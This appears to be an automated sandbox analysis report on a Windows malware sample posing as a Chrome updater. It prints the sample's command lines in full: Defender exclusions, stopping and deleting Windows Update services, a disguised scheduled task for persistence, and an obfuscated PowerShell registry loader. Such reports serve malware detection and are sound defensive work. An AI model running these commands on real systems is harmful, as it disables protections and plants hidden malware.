78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

Analysis

max time kernel
13s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2023 11:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dmi1dfg7n.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Suspicious use of SetThreadContext 1 IoCs

Processes:

dmi1dfg7n.exe

description pid process target process

PID 4572 set thread context of 1500 4572 dmi1dfg7n.exe dialer.exe
Drops file in Program Files directory 1 IoCs

Processes:

dmi1dfg7n.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe

description	pid	process	target process
PID 4572 set thread context of 1500	4572	dmi1dfg7n.exe	dialer.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe

Drops file in Windows directory 3 IoCs

Processes:

dialer.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4900 sc.exe
4520 sc.exe
4052 sc.exe
2304 sc.exe
4920 sc.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

64 powershell.exe
64 powershell.exe
3144 powershell.exe
3144 powershell.exe
4280 powershell.exe

pid	process
4900	sc.exe
4520	sc.exe
4052	sc.exe
2304	sc.exe
4920	sc.exe

pid	process
64	powershell.exe
64	powershell.exe
3144	powershell.exe
3144	powershell.exe
4280	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	64	powershell.exe
Token: SeShutdownPrivilege	4548	powercfg.exe
Token: SeCreatePagefilePrivilege	4548	powercfg.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	232	powercfg.exe
Token: SeCreatePagefilePrivilege	232	powercfg.exe
Token: SeShutdownPrivilege	1568	powercfg.exe
Token: SeCreatePagefilePrivilege	1568	powercfg.exe
Token: SeShutdownPrivilege	4724	powercfg.exe
Token: SeCreatePagefilePrivilege	4724	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe
Token: 34	3144	powershell.exe
Token: 35	3144	powershell.exe
Token: 36	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe
Token: 34	3144	powershell.exe
Token: 35	3144	powershell.exe
Token: 36	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

dmi1dfg7n.execmd.execmd.exe

description	pid	process	target process
PID 4572 wrote to memory of 64	4572	dmi1dfg7n.exe	powershell.exe
PID 4572 wrote to memory of 64	4572	dmi1dfg7n.exe	powershell.exe
PID 4572 wrote to memory of 3904	4572	dmi1dfg7n.exe	cmd.exe
PID 4572 wrote to memory of 3904	4572	dmi1dfg7n.exe	cmd.exe
PID 4572 wrote to memory of 388	4572	dmi1dfg7n.exe	cmd.exe
PID 4572 wrote to memory of 388	4572	dmi1dfg7n.exe	cmd.exe
PID 4572 wrote to memory of 3144	4572	dmi1dfg7n.exe	powershell.exe
PID 4572 wrote to memory of 3144	4572	dmi1dfg7n.exe	powershell.exe
PID 3904 wrote to memory of 4520	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 4520	3904	cmd.exe	sc.exe
PID 388 wrote to memory of 4548	388	cmd.exe	powercfg.exe
PID 388 wrote to memory of 4548	388	cmd.exe	powercfg.exe
PID 3904 wrote to memory of 4052	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 4052	3904	cmd.exe	sc.exe
PID 388 wrote to memory of 232	388	cmd.exe	powercfg.exe
PID 388 wrote to memory of 232	388	cmd.exe	powercfg.exe
PID 388 wrote to memory of 1568	388	cmd.exe	powercfg.exe
PID 388 wrote to memory of 1568	388	cmd.exe	powercfg.exe
PID 3904 wrote to memory of 2304	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 2304	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 4920	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 4920	3904	cmd.exe	sc.exe
PID 388 wrote to memory of 4724	388	cmd.exe	powercfg.exe
PID 388 wrote to memory of 4724	388	cmd.exe	powercfg.exe
PID 3904 wrote to memory of 4900	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 4900	3904	cmd.exe	sc.exe
PID 3904 wrote to memory of 5000	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 5000	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 1784	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 1784	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 2684	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 2684	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 3472	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 3472	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 3384	3904	cmd.exe	reg.exe
PID 3904 wrote to memory of 3384	3904	cmd.exe	reg.exe
PID 4572 wrote to memory of 1500	4572	dmi1dfg7n.exe	dialer.exe
PID 4572 wrote to memory of 1500	4572	dmi1dfg7n.exe	dialer.exe
PID 4572 wrote to memory of 1500	4572	dmi1dfg7n.exe	dialer.exe
PID 4572 wrote to memory of 4280	4572	dmi1dfg7n.exe	powershell.exe
PID 4572 wrote to memory of 4280	4572	dmi1dfg7n.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4520

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4052

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2304

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4920

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4900

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5000

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1784

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2684

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3472

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3384

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
- Drops file in Windows directory
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4280

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:4344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3684

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:2136

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95e958c4-e993-4cf8-a43c-fd4662e40265}
1⤵
PID:4968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
ecceac16628651c18879d836acfcb062

SHA1
420502b3e5220a01586c59504e94aa1ee11982c9

SHA256
58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

SHA512
be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ad3b132dcf2c2524fd766fba7f0e8d6

SHA1
092f934636f2474ce2ab380b464c1f7d1bc140e4

SHA256
7bed9ce9a785e557b8053dea7d43bd68b9de5b087593734968abf86b2cc49ee9

SHA512
c5f1251c626de8014e5214f524d29fdcba391d5fdee0b3da1a386bd58e16fdc37174c28af9d45ed1b58c41bfb8a2ba4337bc57720cfca6d0eee5e0f0ddf255dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3m3po0va.iku.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/64-139-0x0000026AB0AB0000-0x0000026AB0AD2000-memory.dmp

Filesize
136KB

Download
memory/64-145-0x0000026AB0180000-0x0000026AB0190000-memory.dmp

Filesize
64KB

Download
memory/64-146-0x0000026AB0180000-0x0000026AB0190000-memory.dmp

Filesize
64KB

Download
memory/64-144-0x0000026AB0180000-0x0000026AB0190000-memory.dmp

Filesize
64KB

Download
memory/64-149-0x0000026AB0AE0000-0x0000026AB0CFC000-memory.dmp

Filesize
2.1MB

Download
memory/440-251-0x0000028648FB0000-0x0000028648FDA000-memory.dmp

Filesize
168KB

Download
memory/440-258-0x0000028648FB0000-0x0000028648FDA000-memory.dmp

Filesize
168KB

Download
memory/440-254-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/596-233-0x0000020F2F970000-0x0000020F2F99A000-memory.dmp

Filesize
168KB

Download
memory/596-235-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/596-239-0x0000020F2F970000-0x0000020F2F99A000-memory.dmp

Filesize
168KB

Download
memory/596-231-0x0000020F2F940000-0x0000020F2F963000-memory.dmp

Filesize
140KB

Download
memory/628-261-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/628-260-0x000001EE75E60000-0x000001EE75E8A000-memory.dmp

Filesize
168KB

Download
memory/628-296-0x000001EE75E60000-0x000001EE75E8A000-memory.dmp

Filesize
168KB

Download
memory/680-253-0x000001AF02D20000-0x000001AF02D4A000-memory.dmp

Filesize
168KB

Download
memory/680-236-0x000001AF02D20000-0x000001AF02D4A000-memory.dmp

Filesize
168KB

Download
memory/680-238-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/952-246-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/952-243-0x000001CC9A7C0000-0x000001CC9A7EA000-memory.dmp

Filesize
168KB

Download
memory/952-255-0x000001CC9A7C0000-0x000001CC9A7EA000-memory.dmp

Filesize
168KB

Download
memory/1012-256-0x00000218A5B50000-0x00000218A5B7A000-memory.dmp

Filesize
168KB

Download
memory/1012-244-0x00000218A5B50000-0x00000218A5B7A000-memory.dmp

Filesize
168KB

Download
memory/1012-247-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1036-267-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1036-302-0x0000014D9F570000-0x0000014D9F59A000-memory.dmp

Filesize
168KB

Download
memory/1036-265-0x0000014D9F570000-0x0000014D9F59A000-memory.dmp

Filesize
168KB

Download
memory/1044-270-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1044-268-0x000002E666170000-0x000002E66619A000-memory.dmp

Filesize
168KB

Download
memory/1044-306-0x000002E666170000-0x000002E66619A000-memory.dmp

Filesize
168KB

Download
memory/1092-272-0x000001D4FFE60000-0x000001D4FFE8A000-memory.dmp

Filesize
168KB

Download
memory/1092-273-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1092-310-0x000001D4FFE60000-0x000001D4FFE8A000-memory.dmp

Filesize
168KB

Download
memory/1100-277-0x000002D181B60000-0x000002D181B8A000-memory.dmp

Filesize
168KB

Download
memory/1100-314-0x000002D181B60000-0x000002D181B8A000-memory.dmp

Filesize
168KB

Download
memory/1100-278-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1144-242-0x00007FF693040000-0x00007FF693308000-memory.dmp

Filesize
2.8MB

Download
memory/1212-280-0x0000023B69B60000-0x0000023B69B8A000-memory.dmp

Filesize
168KB

Download
memory/1212-319-0x0000023B69B60000-0x0000023B69B8A000-memory.dmp

Filesize
168KB

Download
memory/1212-282-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1244-285-0x00007FFAF3DB0000-0x00007FFAF3DC0000-memory.dmp

Filesize
64KB

Download
memory/1244-283-0x0000022A43CE0000-0x0000022A43D0A000-memory.dmp

Filesize
168KB

Download
memory/1244-324-0x0000022A43CE0000-0x0000022A43D0A000-memory.dmp

Filesize
168KB

Download
memory/1288-329-0x0000029395D30000-0x0000029395D5A000-memory.dmp

Filesize
168KB

Download
memory/1356-334-0x0000027316790000-0x00000273167BA000-memory.dmp

Filesize
168KB

Download
memory/1440-338-0x0000022DDA140000-0x0000022DDA16A000-memory.dmp

Filesize
168KB

Download
memory/1448-342-0x00000168EA090000-0x00000168EA0BA000-memory.dmp

Filesize
168KB

Download
memory/1500-188-0x00007FF606EB0000-0x00007FF606F06000-memory.dmp

Filesize
344KB

Download
memory/3144-161-0x00000201DA640000-0x00000201DA650000-memory.dmp

Filesize
64KB

Download
memory/3144-163-0x00000201DA640000-0x00000201DA650000-memory.dmp

Filesize
64KB

Download
memory/3144-162-0x00000201DA640000-0x00000201DA650000-memory.dmp

Filesize
64KB

Download
memory/3684-204-0x00000262EF460000-0x00000262EF470000-memory.dmp

Filesize
64KB

Download
memory/3684-206-0x00000262EF460000-0x00000262EF470000-memory.dmp

Filesize
64KB

Download
memory/3684-205-0x00000262EF460000-0x00000262EF470000-memory.dmp

Filesize
64KB

Download
memory/3684-202-0x00007FFB33D30000-0x00007FFB33F25000-memory.dmp

Filesize
2.0MB

Download
memory/3684-203-0x00007FFB32F30000-0x00007FFB32FEE000-memory.dmp

Filesize
760KB

Download
memory/4356-207-0x00000000034C0000-0x00000000034D0000-memory.dmp

Filesize
64KB

Download
memory/4356-208-0x00000000034C0000-0x00000000034D0000-memory.dmp

Filesize
64KB

Download
memory/4356-200-0x0000000000F00000-0x0000000000F36000-memory.dmp

Filesize
216KB

Download
memory/4356-213-0x00000000041E0000-0x0000000004246000-memory.dmp

Filesize
408KB

Download
memory/4356-252-0x0000000003580000-0x000000000359E000-memory.dmp

Filesize
120KB

Download
memory/4356-210-0x0000000003900000-0x0000000003966000-memory.dmp

Filesize
408KB

Download
memory/4356-209-0x0000000003860000-0x0000000003882000-memory.dmp

Filesize
136KB

Download
memory/4356-201-0x0000000003B00000-0x0000000004128000-memory.dmp

Filesize
6.2MB

Download
memory/4572-143-0x00007FF67B220000-0x00007FF67B4E8000-memory.dmp

Filesize
2.8MB

Download
memory/4572-167-0x00007FF67B220000-0x00007FF67B4E8000-memory.dmp

Filesize
2.8MB

Download
memory/4968-228-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4968-218-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4968-214-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4968-219-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4968-223-0x00007FFB33D30000-0x00007FFB33F25000-memory.dmp

Filesize
2.0MB

Download
memory/4968-227-0x00007FFB32F30000-0x00007FFB32FEE000-memory.dmp

Filesize
760KB

Download